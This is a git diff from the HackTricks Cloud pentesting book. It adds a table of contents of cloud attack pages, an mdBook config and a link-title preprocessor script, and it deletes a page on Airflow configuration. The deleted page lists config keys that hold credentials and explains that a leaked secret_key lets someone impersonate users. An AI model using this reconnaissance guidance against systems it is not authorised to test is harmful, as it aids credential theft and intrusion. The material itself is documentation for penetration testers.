Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md) - * [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md) - * [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md) - * [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md) - * [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) - * [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md) - * [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md) - * [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md) - * [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) - * [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md) - * [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md) - * [AWS - Security Hub Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md) - * [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md) - * [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md) - * [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md) - * [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md) - * [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md) - * [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md) - * [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md) - * [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md) - * [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md) - * [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md) - * [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md) - * [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md) - * [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) - * [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md) - * [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md) - * [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md) - * [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md) - * [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md) - * [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md) - * [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md) - * [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md) - * [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md) - * [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md) - * [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md) - * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md) - * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md) - * [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md) - * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md) - * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md) - * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md) - * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md) - * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md) - * [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md) - * [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md) - * [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md) - * [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) - * [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) - * [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) - * [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) - * [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) - * [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) - * [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md) - * [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md) - * [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md) - * [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md) - * [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md) - * [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md) - * [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md) - * [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) - * [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) - * [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) - * [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) - * [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md) - * [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) - * [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) - * [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) - * [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) - * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) - * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md) - * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) - * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) - * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md) - * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md) - * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) - * [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md) - * [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) - * [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) - * [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) - * [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md) - * [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) - * [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) - * [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) -* [Azure Pentesting](pentesting-cloud/azure-security/README.md) - * [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md) - * [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md) - * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) - * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) - * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) - * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) - * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) - * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) - * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) - * [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md) - * [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) - * [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) - * [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - * [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md) - * [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md) - * [Az - App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) - * [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) - * [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) - * [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md) - * [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md) - * [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md) - * [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) - * [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md) - * [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md) - * [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md) - * [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md) - * [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md) - * [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md) - * [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md) - * [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md) - * [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md) - * [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) - * [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) - * [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) - * [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) - * [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) - * [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) - * [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) - * [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) - * [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) - * [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) - * [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) - * [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) - * [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) - * [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) - * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) - * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) - * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - * [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) - * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) - * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) - * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) - * [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md) - * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) - * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) - * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) - * [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - * [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) - * [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - * [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) - * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) - * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) - * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) - * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) - * [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) - * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) - * [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) - * [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) - * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) - * [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) -* [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) - * [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) - * [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) - * [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) - * [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) - * [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) - * [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) - * [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) - * [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) - * [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) - * [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) - * [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) - * [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) - * [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) - * [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) -* [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) - * [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) - * [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) - * [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) -* [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) - * [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) - * [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) - * [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) - * [OpenShift - Jenkins Build Pod Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md) - * [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md) - * [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md) - * [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md) - * [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md) - -## 🛫 Pentesting Network Services - -* [HackTricks Pentesting Network](https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network) -* [HackTricks Pentesting Services](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh) diff --git a/book.toml b/book.toml new file mode 100644 index 000000000..4add3bde9 --- /dev/null +++ b/book.toml @@ -0,0 +1,44 @@ +[book] +authors = ["Carlos Polop"] +language = "en" +multilingual = false +src = "src" +title = "HackTricks Cloud" + +[build] +create-missing = false +extra-watch-dirs = ["translations"] + +[preprocessor.alerts] +after = ["links"] + +[preprocessor.reading-time] + +[preprocessor.pagetoc] + +[preprocessor.tabs] + +[preprocessor.codename] + +[preprocessor.hacktricks] +command = "python3 ./hacktricks-preprocessor.py" + +[output.html] +additional-css = ["theme/pagetoc.css", "theme/tabs.css"] +additional-js = [ + "theme/pagetoc.js", + "theme/tabs.js", + "theme/ht_searcher.js", + "theme/sponsor.js", +] +no-section-label = true +preferred-dark-theme = "hacktricks-dark" +default-theme = "hacktricks-light" + +[output.html.fold] +enable = true # whether or not to enable section folding +level = 0 # the depth to start folding + + +[output.html.print] +enable = false # whether or not to enable print diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py new file mode 100644 index 000000000..56a0cf0dc --- /dev/null +++ b/hacktricks-preprocessor.py @@ -0,0 +1,106 @@ +import json +import sys +import re +import logging +from os import path +from urllib.request import urlopen, Request + +logger = logging.getLogger(__name__) +logging.basicConfig(filename='hacktricks-preprocessor.log', filemode='w', encoding='utf-8', level=logging.DEBUG) + + +def findtitle(search ,obj, key, path=(),): + # logger.debug(f"Looking for {search} in {path}") + if isinstance(obj, dict) and key in obj and obj[key] == search: + return obj, path + if isinstance(obj, list): + for k, v in enumerate(obj): + item = findtitle(search, v, key, (*path, k)) + if item is not None: + return item + if isinstance(obj, dict): + for k, v in obj.items(): + item = findtitle(search, v, key, (*path, k)) + if item is not None: + return item + + +def ref(matchobj): + logger.debug(f'Match: {matchobj.groups(0)[0].strip()}') + href = matchobj.groups(0)[0].strip() + title = href + if href.startswith("http://") or href.startswith("https://"): + # pass + try: + raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read()) + match = re.search('(.*?)', raw_html) + title = match.group(1) if match else href + except Exception as e: + logger.debug(f'Error opening URL {href}: {e}') + pass #nDont stop on broken link + else: + try: + if href.endswith("/"): + href = href+"README.md" # Fix if ref points to a folder + chapter, _path = findtitle(href, book, "source_path") + logger.debug(f'Recursive title search result: {chapter['name']}') + title = chapter['name'] + except Exception as e: + try: + dir = path.dirname(current_chapter['source_path']) + logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}') + chapter, _path = findtitle(path.normpath(path.join(dir,href)), book, "source_path") + logger.debug(f'Recursive title search result: {chapter['name']}') + title = chapter['name'] + except Exception as e: + logger.debug(f'Error getting chapter title: {path.normpath(path.join(dir,href))}') + print(f'Error getting chapter title: {path.normpath(path.join(dir,href))}') + sys.exit(1) + + + template = f"""{title}""" + + # translate_table = str.maketrans({"\"":"\\\"","\n":"\\n"}) + # translated_text = template.translate(translate_table) + result = template + + return result + + +def iterate_chapters(sections): + if isinstance(sections, dict) and "PartTitle" in sections: # Not a chapter section + return + elif isinstance(sections, dict) and "Chapter" in sections: # Is a chapter return it and look into sub items + # logger.debug(f"Chapter {sections['Chapter']}") + yield sections['Chapter'] + yield from iterate_chapters(sections['Chapter']["sub_items"]) + elif isinstance(sections, list): # Iterate through list when in sections and in sub_items + for k, v in enumerate(sections): + yield from iterate_chapters(v) + + +if __name__ == '__main__': + global context, book, current_chapter + if len(sys.argv) > 1: # we check if we received any argument + if sys.argv[1] == "supports": + # then we are good to return an exit status code of 0, since the other argument will just be the renderer's name + sys.exit(0) + logger.debug('Started hacktricks preprocessor') + # load both the context and the book representations from stdin + context, book = json.load(sys.stdin) + + logger.debug(f"Context: {context}") + + + for chapter in iterate_chapters(book['sections']): + logger.debug(f"Chapter: {chapter['path']}") + current_chapter = chapter + regex = r'{{[\s]*#ref[\s]*}}(?:\n)?([^\\\n]*)(?:\n)?{{[\s]*#endref[\s]*}}' + new_content = re.sub(regex, ref, chapter['content']) + chapter['content'] = new_content + + content = json.dumps(book) + logger.debug(content) + + + print(content) \ No newline at end of file diff --git a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md deleted file mode 100644 index 2508f970f..000000000 --- a/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ /dev/null @@ -1,137 +0,0 @@ -# Airflow Configuration - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Configuration File - -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** - -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** - -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. - -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. - -Some interesting values to check when reading the config file: - -### \[api] - -* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - * `airflow.api.auth.backend.basic_auth`: For **basic authentication** - * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - * You can also **create you own authentication** method with python. -* **`google_key_path`:** Path to the **GCP service account key** - -### **\[atlas]** - -* **`password`**: Atlas password -* **`username`**: Atlas username - -### \[celery] - -* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -* **`result_backend`**: Postgres url which may contain **credentials**. -* **`ssl_cacert`**: Path to the cacert -* **`ssl_cert`**: Path to the cert -* **`ssl_key`**: Path to the key - -### \[core] - -* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -* **`fernet_key`**: Key to store encrypted variables (symmetric) -* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -* **`security`**: What security module to use (for example kerberos) - -### \[dask] - -* **`tls_ca`**: Path to ca -* **`tls_cert`**: Part to the cert -* **`tls_key`**: Part to the tls key - -### \[kerberos] - -* **`ccache`**: Path to ccache file -* **`forwardable`**: Enabled by default - -### \[logging] - -* **`google_key_path`**: Path to GCP JSON creds. - -### \[secrets] - -* **`backend`**: Full class name of secrets backend to enable -* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. - -### \[smtp] - -* **`smtp_password`**: SMTP password -* **`smtp_user`**: SMTP user - -### \[webserver] - -* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -* **`cookie_secure`**: Set **secure flag** on the the session cookie -* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible - -### Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - -```bash -AUTH_TYPE = AUTH_DB -``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - -```bash -AUTH_TYPE = AUTH_OAUTH -``` - -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - -```bash -AUTH_ROLE_PUBLIC = 'Admin' -``` - -{% hint 